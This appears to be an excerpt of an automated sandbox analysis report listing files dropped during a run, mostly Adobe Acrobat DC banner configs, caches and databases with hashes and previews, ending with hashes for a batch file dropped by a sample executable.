                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfBD2G6UpnrPeUkwRe9:YvXKX5VqYpW7EGR22cUkee9
                                                                  MD5:CF7ABFFADB6910AFF9EF906C565084F0
                                                                  SHA1:D1B7E1CD0897C997D44D8AC77C150B5218041D9B
                                                                  SHA-256:5EE4CF1314FDF80FB7FA50DFDCFFB7D823E08FCB7C623989A067F250707D041E
                                                                  SHA-512:69C201D4C0C6244B4AE37CF73E85F983CC5C5A9E7ACCAE645FFFAC67230650BB70A82EC82C9112352ACC28DF7D72724D98E8F1F04B088A717AB6F434BAC9300C
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.300706573255087
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfPmwrPeUkwRe9:YvXKX5VqYpW7EGH56Ukee9
                                                                  MD5:97F825CE40543D038EDCF00BD3937FC1
                                                                  SHA1:0A065A72F5128DCEA47AC5DC79BCCE697B8ACB60
                                                                  SHA-256:C209E24F3F839853419BC86CBEFD29FDEA018BC10BB63486FE7829901904F987
                                                                  SHA-512:D008FE5D89368071F96B87C9762C4A4B9B00A9026BF0CFA60745C6F9DB8A97FF12CD977BA64DAFEA1AB5638C3E7C7040F4B94C3D94BB87478690A7A3C392FC01
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.68448020659162
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6XLfiBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSD:YvQqBhgy6SAFv5Ah8cv/D
                                                                  MD5:CF90CF6B49CEED22D5C3FE415A02D574
                                                                  SHA1:C5AAFD01B9B1A96C90A1B287CC9633B36961D899
                                                                  SHA-256:267FC05B6A0A39BBF530B9CE4DD60675FE5844A33A864D47B62480B9E03B97AA
                                                                  SHA-512:92C1468B24AEF21C84D370A9AF38B0FAC9D2D6A4143A30FF247555084E53D9A9B1259AABF4CC06504E61744FB36BD74A054D4B40321578B3BB3FEE878E06D549
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.245348485199396
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf8dPeUkwRe9:YvXKX5VqYpW7EGU8Ukee9
                                                                  MD5:6719C287BDF65BFF58F2445DE52D4930
                                                                  SHA1:C7001355B70CF01E2FFDAD1052DA49F05AEDD042
                                                                  SHA-256:FE588DF8042952C52C8E233958F72D403E4C13C32FBA653292B04AEAE1860D5A
                                                                  SHA-512:CF1C08515BEDF6F966A1CC9ECB815D67C2829593F770E110E6585678DBDE330C0E9137118F1F2D8864A19C01EF10CD1FEA199AB9674D6F2A2FC576510C18E576
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.246244748550422
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfQ1rPeUkwRe9:YvXKX5VqYpW7EGY16Ukee9
                                                                  MD5:562CA1BE82DD1A96B7617CFB5EAFDAD0
                                                                  SHA1:2413126F9CE15D95E7C646D2814E8D3522743554
                                                                  SHA-256:9941AFEC258ABFABF39B0DEB4A82A9611D96805DF413AF0AE534042947553037
                                                                  SHA-512:F1EFD1F0AF368F01C9BE6DCCDDD22983CF84EBAE794DA1B591E5CB8750BD167C58C6D47BDD1BFD5DEA3B196F0AB7D404C55E3AE84211B2B4EF22CF52DED9A046
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.2671208582863525
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfFldPeUkwRe9:YvXKX5VqYpW7EGz8Ukee9
                                                                  MD5:747C3C8FB8FCC8DBBB41CD6B45C60E8B
                                                                  SHA1:D0EFFFD40CAE0AA463DC1899CD746E3C1E846D06
                                                                  SHA-256:443796C6279B2F4F429FFF107CDDA6ECE0ECFE9E3C46DA50D5F86C0026C0C8EF
                                                                  SHA-512:70DDEE35C5882D125DCE0BA8B0A3E223E657360F0B59A576919C247904B176ADE93DA7E90A2474CE49A7F98EFF164F6E5B9D9438E726A35860884D979F9512F1
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.275449955068809
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfzdPeUkwRe9:YvXKX5VqYpW7EGb8Ukee9
                                                                  MD5:80BC593B63B721505F2BF0BD63E29562
                                                                  SHA1:9B6964E75BF04AF9C1E5ACD465A7249EFD733EB8
                                                                  SHA-256:7BBD3A0C4C90237760840AD7F05BBC00498A2BFAF306F5A52564FAC62BBBDE68
                                                                  SHA-512:C0337FA4A761F49FD100BA52C94E1A0E785B9DFAF7906A67957AF6A30822E83D1DE03AA5226D23EE4865D421E8309F560F0677F701FA9A90857E116B8481BA7C
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.254575972396364
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfYdPeUkwRe9:YvXKX5VqYpW7EGg8Ukee9
                                                                  MD5:03F228E2201ED366C5DFA9710DF2F396
                                                                  SHA1:8BDF9E6E3A81FD813FC2A6D5E5E0F31AF640CE0A
                                                                  SHA-256:0A01C3B390D3174A6F60C70D9675BBFAC794A832B4B4C2CADB790A4F18D1E872
                                                                  SHA-512:DBE7F50E9423057CC3659008FCE9856D3C0E9603E2EBACA397DDCD919A1839BD194A84A615E72EDFDA4ED080B705B568426789F1FB4F68E947D32AFF789D5C8A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.2401256173510395
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf+dPeUkwRe9:YvXKX5VqYpW7EG28Ukee9
                                                                  MD5:CB060455E544FBF44537CE688631590A
                                                                  SHA1:FD90F7273706F0DF5D1DC79801B02D811A55DE92
                                                                  SHA-256:DA24E78C4F62D543DF731F745359CA9135BD448F415DBF4D9EA1800A2F49426F
                                                                  SHA-512:2545851483755EEB8CB2B3E9D2815B3B8CA07A0E2C4D096F5194545241361DD591DE0E5971B2AB6BBF0B840DE1C1087DC7D2D79E5F3AD60809AAF7B262F2533F
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.238435262699805
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfbPtdPeUkwRe9:YvXKX5VqYpW7EGDV8Ukee9
                                                                  MD5:7A67990159975FE74237AB999464684E
                                                                  SHA1:27B1D7467F0B81F94E2CA210EA517D40DD31CB93
                                                                  SHA-256:D506903B187C34BCF9E3DF936514CBFC9074270D6A1A7A0B8E7B465C3BE0D27E
                                                                  SHA-512:09D1856BDD440E7F3FA6B727BBF4842CED8A018A724532372390621C21A3B482D6537293480D57EB73C879D12E0A0473408898B37858647740B926F93C60F166
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.238829995516854
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf21rPeUkwRe9:YvXKX5VqYpW7EG+16Ukee9
                                                                  MD5:32C68EB6EC0591BC69D20457B2562FCE
                                                                  SHA1:9DAD255D47741ED1ECEF2BE1602F7933C3AE76CE
                                                                  SHA-256:0F0BD1BD015FB15778872B365D7A0A4EC21C08476F272ACA23AD12B5F8963BDD
                                                                  SHA-512:48254709ECD13F2CC9DC6977FC2348AB919AAF4C804C267586ABA4D8D665B93BDB99EB9BD827F199D61B22821AD5954B4C7A75F79543F8B02720752484DFF78E
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.655642017487848
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6XLfiBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSD:YvQqNBgkDMUJUAh8cvMD
                                                                  MD5:DBA924F0464B387C58F085B544A54833
                                                                  SHA1:EA354E125C682959429E9C26D986F52EAB36E4B5
                                                                  SHA-256:A2378769EDCDC46FB56E1E086C6DBBD8EAE8C66C02D0763AF9237339D5FB7B28
                                                                  SHA-512:C8C661AB959DC246625374E3382C094A08FCDAC08E77D88FE08ADD1EA7E755D6AB6AF7F5C55C9B6886271A78CF7D217397F7CAB379798B107EAE80EC1BE722D8
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.213935032636147
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfshHHrPeUkwRe9:YvXKX5VqYpW7EGUUUkee9
                                                                  MD5:E2EBD6019E517FD0889C1ACA3EE0417C
                                                                  SHA1:3176E30F166A140CBA842DCF49793149A2604D67
                                                                  SHA-256:92ACD4A5799536B098BE593BF112ABB6F8CC3F7EF3D85E1DA538B39E8F64FB07
                                                                  SHA-512:FE7F67B5D2D79DAA70932E54E398934E17DF752FF6E4F30F85E17C9FF1AA8B4B319608AF0E090A0876485AA8EF49156572BD38B9F6B5B38D92610EB7C3880944
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):5.220686980902129
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJTqgFCrPeUkwRe9:YvXKX5VqYpW7EGTq16Ukee9
                                                                  MD5:7FE5CC4C1DB35D8C77A4BD9D8CDAE77F
                                                                  SHA1:246F5D4ECC26948C0B3E6EDD56ED482B7297EE8C
                                                                  SHA-256:F4400108AA1460DC901D97C257F859E18D0BABDB0183A9F941370CF80C20261B
                                                                  SHA-512:97CBD72FEA25676CDF666C5BA764C78EFB8ACB8CDFAE1F766E0A9C52536BBB88CF2A78176ECF814032206F2AD9606F1EE4E1EEA25DC996FF6FDF0BBA5E3DB744
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):0.8112781244591328
                                                                  Encrypted:false
                                                                  SSDEEP:3:e:e
                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                  Malicious:false
                                                                  Preview:....

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):2814
                                                                  Entropy (8bit):5.1407104949892
                                                                  Encrypted:false
                                                                  SSDEEP:24:YRea3CayHv+JsmCkWrYjTs8FbZuj52oj0SCThm2r2LScCaDnYJDs2FZ56o9eVGru:YQrmCHyFE8qpiK1YJDs2nT9UGy
                                                                  MD5:F956F501D183F1A5752FAAFC66839138
                                                                  SHA1:38A299EDD54007A6A704589DF92B109DFE08663B
                                                                  SHA-256:A4FA0225184FB35212029D6DB092B24F0ABC03397D10FF9BBDCBF0B042075232
                                                                  SHA-512:B89BD3AC3DD4448D5523883270CACBD1C3C649549F249AD02E0C1C539FC53A81019B8EA5AA48788BCA3474C8FB7B0A98EA4F5A15ED2852CA937C25CA6F5C31B1
                                                                  Malicious:false
                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"7c95fe3caa79a3524d01819b2db43cc1","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956961000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"0971297107b193b31d045b99db5e534d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956961000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"246a541366f44e8034c78e5ca21720b2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956961000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"7d1b325e0e98ec0bedec5cde69100b29","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956961000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"5fa468dc7ecfb7a7305e9bd302ddcfa1","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956961000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"933016c959d7d6ad9de07517dcfae9f0","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):0.9854217771248548
                                                                  Encrypted:false
                                                                  SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp2vLd4zJwtNBwtNbRZ6bRZ45vLdF:TVl2GL7ms6ggOVpo2zutYtp6Pm3
                                                                  MD5:C0216B7A2C6F8C762B56198FE06E1666
                                                                  SHA1:EA46641BDF25DCC8BFA99B29642DB4117C209E85
                                                                  SHA-256:CE6448FDE0C843D7267200A90E34C5E0A7DBD24D91AC11946117876B2D04A08E
                                                                  SHA-512:C255EAD5347D5FF29C1C163CB8697245FF564CEB9FAA99A30AE384F1CF3F85C85C0323DA09C7FA1CAD4757B839378F2801E9D7306B4C21CFEA2F8202EB61DD2B
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.337624118517311
                                                                  Encrypted:false
                                                                  SSDEEP:24:7+tphhAD1RZKHs/Ds/Sp2vLdPzJwtNBwtNbRZ6bRZWf1RZKjVRqLBx/XYKQvGJF4:7MjhGgOVpotzutYtp6PMmRqll2GL7mso
                                                                  MD5:66AC29103993D3FFF69D7859553FB06B
                                                                  SHA1:40D979A3D24623651BD77CF4536F4FA699B4A74A
                                                                  SHA-256:1D088EB0307BF904041DB360550EAA8B66EB71DC481B949C8B309F2AB4AB9FEC
                                                                  SHA-512:49B74DD4976596416FB1CAC3A5831FA475CB963BCBF5DEF245E32D2BEEB3D4C7CD20A2E71700891E7CB0257F69C3350DF2CC5A1B28AC02C1511BE99A4A821526
                                                                  Malicious:false
                                                                  Preview:.... .c.......7U......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                  Download File
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgrW6t4+bqvFgyay5n4Eij4P0Yyu:6a6TZ44ADErW+4+blycU0K
                                                                  MD5:E17F31AF2F6A25A366831F968E846073
                                                                  SHA1:F460F9E2E21F0100421BEC4C3D8975AA90C7F386
                                                                  SHA-256:D253E84D86248B3916253C02B364AA01C64C120E09D1A05D57D60F304C156632
                                                                  SHA-512:4B747EB30DFB22902BEA49E0A127B06AB2A00BA78CED7A9619883F3E8AAECF4A3391DF0B23B2D63947EA80D5BDAFCBB36E12F1F81F698D675F169A1F52181863
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                  C:\Users\user\AppData\Local\Temp\7ZipSfx.000\0271695705143540

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  File Type:DOS batch file, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1063
                                                                  Entropy (8bit):5.595995239629694
                                                                  Encrypted:false
                                                                  SSDEEP:24:gAULfghONR/OscFDuRCUKk7W26KkTczNJjE/tfW2tfnnLhA6MDxx/m:sLTR/OsSuQTI5rNJkflfnlLGx/m
                                                                  MD5:38910F2D879725612BA1097E1F825C1E
                                                                  SHA1:99F3C92122A6B333F94304DEED7D55D140BD9456
                                                                  SHA-256:6D0A44B3563ADED3F056590B5A6FB848A9E17AF66F89F6C603068A379C372472
